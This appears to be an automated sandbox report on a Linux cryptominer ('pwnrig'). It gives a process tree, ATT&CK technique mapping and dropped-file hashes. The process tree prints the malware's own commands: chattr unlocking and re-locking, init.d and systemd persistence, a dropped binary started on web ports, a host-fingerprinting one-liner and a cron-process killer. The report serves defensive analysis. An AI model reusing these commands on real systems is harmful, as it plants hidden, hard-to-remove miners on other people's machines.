/usr/bin/whichwhich chkconfig4⤵PID:3931
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:3932
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:3933
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:3934 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3935
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3935
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3935
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3935
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3961
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3961
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3961
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3961
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3987
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3988
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3988
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3988
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3988
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:4014
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:4015
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:4017
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
PID:4018
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:4019
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:4020
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:4021
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:4021
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:4021
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:4021
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:4047
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:4048
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:4048
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:4048
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:4048
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:4049
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:4049
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:4049
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:4049
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:4075
-
-
/usr/bin/whichwhich systemctl4⤵PID:4076
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:4077
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:4078
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:4079
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:4081
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:4082
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:4083
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵PID:4084
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
PID:4110
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:4136
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:4162
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:4219 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:4243
-
/usr/bin/hostnamehostname -I4⤵
- Attempts to change immutable files
PID:4246
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:4248
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:4253
-
-
/usr/bin/headhead -n 14⤵PID:4252
-
-
/usr/bin/grepgrep "Port "4⤵PID:4251
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:4250
-
-
/usr/bin/whoamiwhoami4⤵PID:4254
-
-
/usr/bin/hostnamehostname4⤵PID:4255
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:4256
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:4262
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:4261
-
-
/usr/bin/cutcut -d: -f24⤵PID:4260
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:4259
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:4265
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:4268
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:4271
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:4272
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:4274
-
-
-
-
/usr/bin/nohupnohup ./klibsystem51⤵PID:1616
-
/usr/bin/klibsystem5./klibsystem51⤵PID:1616
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48B
MD5def1d7486172ba61e9598d53036a4ad9
SHA12c0ff59f49b0b97c560a4a18a6667c534d537945
SHA25652574d1100fe31c4d9641659df9e3a70c44fdff7ae121f2d285f5751da5d5cfc
SHA512c79e843a322fd8128c49a1af3acdfbe6a5cef11be325acdb4c493bd96f6a48e4ebafb219aa402a31efc25640a893fcef08fc3a3051a8d99c60801a37581e7857
-
Filesize
56B
MD58c859e42eefa73f61c0fb8d4f7c774b2
SHA16214fc948ec5a137e1354cb5a3b95c4b50ed3a63
SHA2565766ae1a918f0bd012824b8d48e5a6cd798ab58f11898cb7807761e1ad105486
SHA512249cbad473df1d75c20bca35d0bda38cde1bbaaf1fb82a71f41d33b4770d166411fcad7230e43bee3735c00e35df6e15852b3c6875fdf16ee6cc07eb1311fed7
-
Filesize
45B
MD5b054422799689ef51afd93e6dcada227
SHA1214f30c032926bef314b79a655bfac4fd6e594bf
SHA256641abe140afea25af088f566ec1688e4c26ba7ca96f56e642b11d5bb02a5933c
SHA512a45124aaf74accccf7b9e449d579f41bfd793003354c38e513113f8df4170093e568915fee3f7a166669346f1c24abf0fbfd319a6e5c35e24c1a962ba2fa70f6
-
Filesize
48B
MD5eb6b211780ccbdfd5583bfaea0a795f5
SHA1f5283f40c9ca043cb9650bf86a02bfabceb917fe
SHA256d15ef39649f99788713d2eae56157e09210f38fe4e7f0fd93ff3d5fa603a29cf
SHA5123492353732983405f735c4e2b6ea4f42443c1ff724f81ad27c4d620024baecfc4c17f7a34594b6d3a47b95c55a73b654dbc636285578933069dac0140ce7e042
-
Filesize
199B
MD5906980accf4b594d289d69ab3c2b212c
SHA107d5e5111fe11aa1aaa66c61dc4a3df74b3ec6dd
SHA2562e4d6729014e1722ea4839b574d63c0e17a72a99c7ff2fd73bbb981c3429d92c
SHA512467b5bffb60506600723b0b416393853d21bfeb19986537a492716a338de4deb2cfe414e62c047798d1ad3b945d1571f1286e6d9627f823f35e7704b0d095fb0
-
Filesize
196B
MD585af470e35a1ae54466bb6d33978ad92
SHA1d3a7f7639a62dd11db91fbcf55922e29b66f1935
SHA2560940db984b9b439904954693b7d2fd4dd9b295e1cb4c440b203b2e72a3aea0ba
SHA512a2702d6157fe0f475a04ff10d0860756e1aaa7c9ee0ff05ae51ef13c7d8cb358ddc85011557e37a142ec1803e5a8551dbfc873ffa85437e5e97bfdff89c18145
-
Filesize
335B
MD5631c4cbba9e4b1460406d10e565f782a
SHA1047d61155b9be60c794f80764247ef769c215e64
SHA256197b329bf9dbc8a79b5b8e1b71e63e07cd6536555bbc6523116a90cc307f9aa2
SHA5127f036a16230bb2112c764c3a412cf462cf2c03c3b863beb98073774f02e5906d72a1c52992ee5885bea745d771ab3ab20be15090656510982788204da450c446
-
Filesize
384B
MD515caeb685929dab65b1094f9e5c4b29f
SHA12b1141235c528d8ef5aba5ec6567441d04b2634f
SHA256ac406aa204b2dd2c018a98fdb2090f99821be750dae169f5ca13a080822ac8b0
SHA512590862dfff0c3537ea515f8caf28a658c5419140819232d396ce2f0063532d6bb8b6c808df775c3185e6f08f868154879c4980c5d14b38fa1fb2eaa3392a1c71
-
Filesize
381B
MD531fc62b7f5d35aac493ca5162b16f812
SHA123aae8aa6388120308c0bdacb66fee7ac8e8641b
SHA2560e36d48719109e697a24e8fe2f72239109f55071ae9c603f85301029fb09271d
SHA51269e99a9aaebd79746d04cb022107a4b813e4d9a806ba55e53d6493c9b3a893156a5518117dcf8e7d6cdae3e5598a56feff2b108e5707eea85cafcaddb6b7d776
-
Filesize
360B
MD55ef8bc6ff2b248c7603a5e7d9c232e8a
SHA101ab099d6781c8666e41501801f88658ddf17705
SHA2560174d066d6d45ddee8691cb84084efe3f0769f65932bd3ba373248df0ad42879
SHA512b32c120531f88e7cbfd1205761d098d4af57e227214c2a82ab78b83d376fe900b605ecea3ccc8f33c50b50fc2bd9c0e3caa960e4e235e47f5573a55cafceb86b
-
Filesize
2.3MB
MD5b9f096559e923787ebb1288c93ce2902
SHA194851bcc8f9c651bcda0ff33d17356cb0b16cf12
SHA2561fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
SHA512ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
-
Filesize
184KB
MD563a86932a5bad5da32ebd1689aa814b3
SHA1472548a4b8295182f6ba8641d74725c2250b7243
SHA2560013b356966c3d693b253cdf00c7fdf698890c9b75605be07128cac446904ad9
SHA5124631e014f77c683819ae34278625b21525d9fa0697e5376ff2babfd77af3ca609fb4a82cde2374f2c96b00dc52cdc34d7efdc40a7ee2609566a6b6e9e630f332
-
Filesize
388B
MD534bba0e0c7ab1c364409fc350fa37868
SHA1a362f6eb47fa0ae5973d1d3b72a20e3c727cbd56
SHA2567d3126408366c9a8813fac8aa2e970e18e837542209c38b751bdee68c06304e1
SHA512249b8608d3a89f9e2a075a6b8164457686a256665729d7e441cafcba35567dd157eeb5123221c8ee4377993907e0100bcd55888fb94a36b557074c0df2850b26
-
Filesize
385B
MD59297e32544b3f6f52346919c3dcc4d78
SHA1a817c64117b4cba178242bf99b008c094f836c7c
SHA256fb6251a22cfb915b67202de5f89f331f18559e09438a89914271fe51018a4311
SHA5128472916e8ed3c8cc7c8db00c2dbe6c103d18406deb6f2d3b7cdba2573cc843adff36a7814997a25f134a53434b8d9c87705d0a184534dae617b2e9b385763662
-
Filesize
224B
MD5f19cde57edbf6eec09e71cc747388806
SHA1672918987a55bb6c8af850a0a7d733d628f37e19
SHA256fece5b528c7df260dbe88f2cb3c50548cfe5c59bdd9e0d88332055346c7695de
SHA5122c17c86a3033a4f764ad6260c1b3cab4c9c01e714025b9bf3c988a4d15c76c12485c27b3bf34646de251b5d81b45485dc1069b571227c0f3d4369512314c09d6
-
Filesize
223B
MD5a16b02c91b7479bbff7db66be7a9ef77
SHA1e4cb6929d684fe89cf5ea2f52b7bbef266c7f293
SHA2563bbac5133807d58654db87f83188a898eb54457845f6d1cee03221ec72bf8ed5
SHA512c8afe266da88d9c355f9036affa66038bbee74ce265d3a80f643996c8e2d75a3eb125843706a837f8f7ff97ec1c27fc35504f17fa8dfeed6f8b03b0c78c3bdc1
-
Filesize
219B
MD5b3f93c5e0c4f8d1d736513a220c6b36b
SHA12e98becba692338ca38470cfbd47802ea3ef85c9
SHA256c262e08a2bcf5d08619568acb6151e6a53b982a9ef3d47c3a2b42548f970b1ed
SHA5124ad9aada020df4e07a1ac0e215ea5378c1b41e30657221b705adb6d7d6659833d3a8aaeebd642d23b244603c0f37be5d743ec83ae50e8dd47af6b8ca03ed3e43
-
Filesize
231B
MD59a5f775bd43bbbf801af2d8a629ca7ba
SHA1f3494cfb32066368729f91c99f2a6e172f7262b9
SHA256717fc6f8f4d3d93308dcb7e53185da822a46b03f2fdbe2c287961eb2082e705e
SHA512a6209d22debfa265aa1ea788df6c538f843eed7f421e8161dbd3eadd1d6fb9b63e3b0def6ae711f675054153b6490c222a205cdae4a1905441502afec927cfae
-
Filesize
220B
MD5110a4b4be7c653ea69c6961f91cc4b92
SHA1d3cb5a468e401e118348392bb20e9d090e0af0d3
SHA25635193fb85c0f7dd78d07b0008fc04519e4873d477e4a900529294825d3bc68a2
SHA512f3dc0a870f39473aead0a9cb186859094977b618ba1ac136f6492bb662ca63be5599a3fc2e4f8a60d2bebee21610ed99f384b670b1f784d15eb2292ab7bccf97
-
Filesize
223B
MD50e3bfa0d62dcf9e6b19f64ac7b2f7a6c
SHA155c9a00c3caaf54e07183dcc60b59e692425d3f7
SHA25623f986e9f6cfcaececa1835c2c770d92cbabfd9e6f482574215b8c782d418d48
SHA512a73888b9d9312c4dd4830db61f9575caa18c803e9c7499548778d8dc5dcd3c61b847edc2e547f364271199aa4d425f7039d251b663b2000c9048d80369ee3b0a
-
Filesize
223B
MD54b01b79a9832a1758efbf23e15e7db9d
SHA19526d594b895f4658d119da5048976e946b6c6b6
SHA256f1eb5f96f2a51a37d73dbdb6f27bc378a6f13f73ba9ade8ef7f2eff892cdeaf5
SHA5122124a44cbacfa6e8c1db20e9920f36589099bbe3485a2c763aa2efbcf9c9f86278ce90ea7be8b1b46e3be187bf31c27a7096673ed7c7e192f7b2fdc3e1fddd3b
-
Filesize
220B
MD5dcd5193fc07d8ff522a5e2f60ef32295
SHA1e041913e7adf8cd599e80e63a73c64f136eb0b82
SHA2567da26508b3da399089cf3199858f49db88d72901ce2bf492f723dc6444a5b8f4
SHA512302f86cf3969068a171fed4a481a2ccb4b3cf032901e9a46c6a3219b3b2310fb06b8b8432fe731fb393ace3cbcb57242b4fb8f9e07ada3fb83226e6aaa2c68cb
-
Filesize
223B
MD57dac898f3c5a18b02b75e28f84a194bd
SHA132409de2ccd73efb269afeef33e7a6c89bb5458e
SHA256ae5bb29da763c47b9711f50068e5da118597a0e3d9d42f47ce95c275272464b6
SHA512cbc9497b278452e7a9c08c19c7596c22d7fa82a5987da5cd1f29383dee441ffb1f8bb87b2a8ca1ccb5574877765a0fd1c97f65c206fbfdbb8ac24d016716e151
-
Filesize
220B
MD5ae942fb479c5488e2d27dbf301576574
SHA13de7e5119ca58995d27ebaf64e986b1b5f314fec
SHA256c0ecb046ddea81ff203423bc9ca1955543ec9cf5ac852ee2f0f65cc5bde1742d
SHA51262222066f39c4ed4b47c7b1ed81ff8337123a73a6dfc101abe3911252f6a82cc73ffdb76264a72417b6373890e34772a5a2c5466abc707ed229744450b5b67e2
-
Filesize
231B
MD581ce290b829488b52ae890c7910ffbbf
SHA1a8038fc1be3f53c987997c4dbb687149b5ea36fd
SHA256efa4661286dc2973da507e4091d138c7fd462f970963989b1910c45672a5e2ea
SHA5120bcae9cf45c9b945332cbf0681179cf3179a421bb7b262195b376ecc054a2a84d65cf38b093f54a6fee62e773a4b039243ceb89f1d75ec5bd074908de551c5a4
-
Filesize
223B
MD5081162b035117dc8864f212a0dbc8f3d
SHA145b782f8f10ea7205a57a2fadd26ebe4fcc4e2af
SHA2563c545972617e88c305ba0ad6b811911cc73e06ac8e98216f3b89e571165a66fa
SHA5129945a944a4b3eb6e665ce19abcfce369fa0df1df5ebc6be59d8cb0e13ca59dc6616289791003e34f37f960afe4483612aae49b2c7b4b73ca40790a56474ff2e7
-
Filesize
231B
MD5703a9a59709ee101776741081deefbbe
SHA104d512637c12df8c222ef817bcc2f9a22da7938b
SHA256c6a475d5720687b34cfb676585931aeb8e367e917d0925edd9432fdba5fe9b37
SHA512d809ae39d37e432fd603c23ba229c44314485f15066dcf4d38467fb0a8275fe63c8bf5b8f25c59e129ff61709a23240c7f7e0a48c5e07d17577f0f1a84a04bc6
-
Filesize
7.0MB
MD5c91421f0d68095890b50a034dbf9d060
SHA1624e0d9c94309de8d038b2e21cf07685d2020fdb
SHA2562f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
SHA51263d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88